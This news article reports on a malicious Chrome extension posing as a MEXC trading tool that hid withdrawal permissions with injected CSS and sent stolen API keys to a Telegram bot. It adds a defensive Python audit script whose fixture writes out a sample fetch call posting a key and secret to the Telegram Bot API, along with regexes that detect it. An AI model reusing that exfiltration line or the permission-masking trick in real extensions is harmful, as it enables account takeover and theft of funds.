A malicious Chrome extension posing as a trading tool for the MEXC exchange has compromised user accounts and stolen cryptocurrency.
Quick Summary – TLDR:
- A Chrome extension named MEXC API Automator secretly enabled withdrawals and stole user API credentials.
- The extension exfiltrated sensitive data to a Telegram bot controlled by the attacker.
- It manipulated the MEXC interface to hide dangerous permissions, misleading users.
- Despite being flagged, the extension is still available on the Chrome Web Store at the time of writing.
What Happened?
A malicious Chrome extension called MEXC API Automator has been discovered stealing credentials from users of the cryptocurrency exchange MEXC. Published on the Chrome Web Store on September 1, 2025, it claimed to automate trading tasks but instead gave attackers full control over victim accounts. The extension was flagged by cybersecurity firm Socket, which exposed its deceptive techniques and urged immediate user action.
🚨 New research: A malicious Chrome Web Store extension is stealing newly created #MEXC API keys and exfiltrating them to a Telegram bot, enabling full account takeover with trading and withdrawal rights.
— Socket (@SocketSecurity) January 12, 2026
Details → https://t.co/U3Z6gCcZ7a #crypto
A Closer Look at the Threat
The extension was marketed as a productivity tool to simplify the process of creating MEXC API keys for traders. In reality, it was a credential-stealing malware that allowed attackers to:
- Create new API keys with full permissions including trading and withdrawals.
- Hide the enabled withdrawal permission from the user interface by injecting CSS that masks its real state.
- Intercept and send API credentials to a hardcoded Telegram bot controlled by the attacker.
Once users visited the MEXC API management page, the extension injected a malicious script into the page. This script automatically ticked all permission checkboxes, including withdrawal rights, while the injected styles made the UI look as though withdrawals were still disabled.
After the user completed two-factor authentication (2FA), the script grabbed the newly generated API key and secret and sent them to a Telegram bot using a fixed bot token and chat ID. These credentials gave the attacker programmatic access to the victim’s MEXC account, letting them execute trades and withdraw funds without needing passwords or additional verification.
How It Works
- Operates only within the browser during an authenticated MEXC session.
- Does not bypass 2FA but waits until the user completes it to steal the API key.
- Sends the captured credentials via an HTTPS POST to the Telegram Bot API, using a hardcoded bot token and chat ID, where the attacker collects them.
- Maintains deception by hiding withdrawal permission status in the UI with injected styles.
- Uses Russian-language comments in its code, suggesting the likely origin of the threat actor.
The attacker used the alias jorjortan142 and promoted the extension under the brand SwapSushi. This handle appears on multiple platforms:
- An X (Twitter) account with the handle @jorjortan142 branding themselves as “sushi.crypto”
- A Telegram bot at t[.]me/swapsushibot
- A YouTube channel promoting SwapSushi tools
- A suspicious domain swapsushi[.]net flagged by anti-scam communities
MEXC: A High-Value Target
MEXC is one of the world’s largest centralized crypto exchanges, serving users in over 170 countries. Its support for API-based trading and withdrawals makes it a prime target for attackers seeking direct access to user funds.
Although MEXC officially blocks users in countries like the United States, Canada, and the United Kingdom, many users in those regions bypass restrictions using VPNs. This significantly expands the potential victim pool and complicates incident response.
The stolen API keys:
- Are long-lived and often not rotated regularly.
- Are commonly used across bots and trading systems.
- Are less likely to trigger alerts compared to logins.
This allows attackers to quietly drain funds over time or rapidly execute trades and withdrawals before users notice anything wrong.
Security Recommendations
Socket’s researchers warn that this kind of attack may be replicated across other exchanges and financial tools. They recommend:
- Auditing all browser extensions on devices accessing financial accounts.
- Removing suspicious extensions, especially those offering automated trading or API features.
- Treating API keys as high-value secrets by storing them securely and rotating them frequently.
- Monitoring for anomalous behavior like API key creation or trades from unfamiliar locations.
- Using browser extension allowlists and centralized controls in enterprise environments.
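The mechanics above (a content script scoped to the exchange's API page plus a hardcoded Telegram Bot API endpoint) are exactly the combination a local extension audit can look for. The following is an added example, not Socket's tooling or anything from the extension itself: it walks a Chrome profile's Extensions tree, reads each manifest for host patterns reaching exchange domains (or broad patterns like `<all_urls>`), greps the bundled JavaScript for `api.telegram.org/bot<token>` calls and `chat_id` values, and grades each extension. The exchange domains, the Telegram token shape (numeric bot id, colon, 35-character secret), and the sample extension fixture are assumptions constructed for the demo; no real token or identifier appears.

```python
"""Audit installed Chrome extensions for exchange-page access combined with
Telegram Bot API exfiltration. Added example; not the article's or Socket's code."""
import json
import re
import tempfile
from pathlib import Path

# Assumptions (not from the article): domains to treat as exchange targets,
# manifest patterns broad enough to reach any site, and the Telegram bot
# token format (digits, colon, 35 chars of [A-Za-z0-9_-]).
EXCHANGE_DOMAINS = ("mexc.com", "mexc.co")
BROAD_PATTERNS = ("<all_urls>", "*://*/*", "https://*/*", "http://*/*")
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot(\d{6,12}:[A-Za-z0-9_-]{35})")
CHAT_ID = re.compile(r"chat_id\W{0,3}(-?\d{5,20})")


def _urls_from_manifest(manifest: dict) -> list:
    """Collect every URL pattern an extension declares, MV2 or MV3 style."""
    urls = list(manifest.get("host_permissions", []))
    urls += manifest.get("permissions", [])  # MV2 kept host patterns here
    for cs in manifest.get("content_scripts", []):
        urls += cs.get("matches", [])
    return [u for u in urls if isinstance(u, str)]


def audit_extension(ext_dir: Path) -> "dict | None":
    """Grade one unpacked extension directory (the one holding manifest.json)."""
    manifest_path = ext_dir / "manifest.json"
    if not manifest_path.is_file():
        return None
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    urls = _urls_from_manifest(manifest)
    exchange_hits = [u for u in urls
                     if u in BROAD_PATTERNS or any(d in u for d in EXCHANGE_DOMAINS)]
    bot_tokens, chat_ids = set(), set()
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        bot_tokens.update(TELEGRAM_API.findall(text))
        chat_ids.update(CHAT_ID.findall(text))
    finding = {
        "name": manifest.get("name", ext_dir.name),
        "path": str(ext_dir),
        "exchange_urls": exchange_hits,
        "telegram_bot_tokens": sorted(bot_tokens),
        "telegram_chat_ids": sorted(chat_ids),
    }
    # Both signals together match the described tradecraft; either alone
    # deserves a look (a bot token is rarely legitimate in an extension).
    if exchange_hits and bot_tokens:
        finding["verdict"] = "suspicious"
    elif exchange_hits or bot_tokens:
        finding["verdict"] = "review"
    else:
        finding["verdict"] = "clean"
    return finding


def audit_extensions_root(root: Path) -> list:
    """Walk a profile's Extensions/<id>/<version>/ tree and grade every entry."""
    findings = []
    for manifest in root.rglob("manifest.json"):
        f = audit_extension(manifest.parent)
        if f:
            findings.append(f)
    return sorted(findings, key=lambda f: f["path"])


def build_sample_root() -> Path:
    """Constructed fixture (not real malware) with the described layout,
    so the audit runs offline. The token and chat id are made up."""
    root = Path(tempfile.mkdtemp())
    bad = root / "aaaa" / "1.0"
    bad.mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({
        "name": "Exchange API Helper", "manifest_version": 3,
        "host_permissions": ["https://*.mexc.com/*"],
        "content_scripts": [{"matches": ["https://www.mexc.com/user/openapi*"],
                             "js": ["content.js"]}],
    }))
    fake_token = "123456789:" + "A" * 35
    (bad / "content.js").write_text(
        'fetch("https://api.telegram.org/bot' + fake_token + '/sendMessage", '
        '{method: "POST", body: JSON.stringify({chat_id: 987654321, '
        'text: key + ":" + secret})});')
    good = root / "bbbb" / "2.3"
    good.mkdir(parents=True)
    (good / "manifest.json").write_text(json.dumps({
        "name": "Ad Blocker", "manifest_version": 3,
        "host_permissions": ["<all_urls>"]}))
    (good / "bg.js").write_text("chrome.runtime.onInstalled.addListener(() => {});")
    return root


if __name__ == "__main__":
    # Point this at a real profile instead, e.g. ~/.config/google-chrome/Default/Extensions
    for f in audit_extensions_root(build_sample_root()):
        print(f["verdict"], "|", f["name"], f["exchange_urls"], f["telegram_bot_tokens"])
```

The fixture's helper extension is graded `suspicious` (exchange host pattern plus a bot token with a chat id); the ad blocker lands on `review` only because `<all_urls>` lets it script exchange pages too, which is the right prompt to check what it actually does there. Obfuscated or packed scripts will defeat the regex, so treat a clean result as "nothing obvious", not as a clean bill of health.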
Socket’s AI-based scanning tools have flagged the MEXC API Automator as confirmed malware. They are continuing to alert users and have reported the issue to Google.
SQ Magazine Takeaway
I find it shocking that a malicious extension like this could stay live on the Chrome Web Store for months, even after being flagged. Crypto users often trust browser tools to make their lives easier, but this is a reminder that convenience can come at a steep price. If you’re using any kind of extension that touches your exchange account, now is the time to double-check and clean house. Even if you’re security-savvy, UI tricks like hiding withdrawal permissions can fool anyone.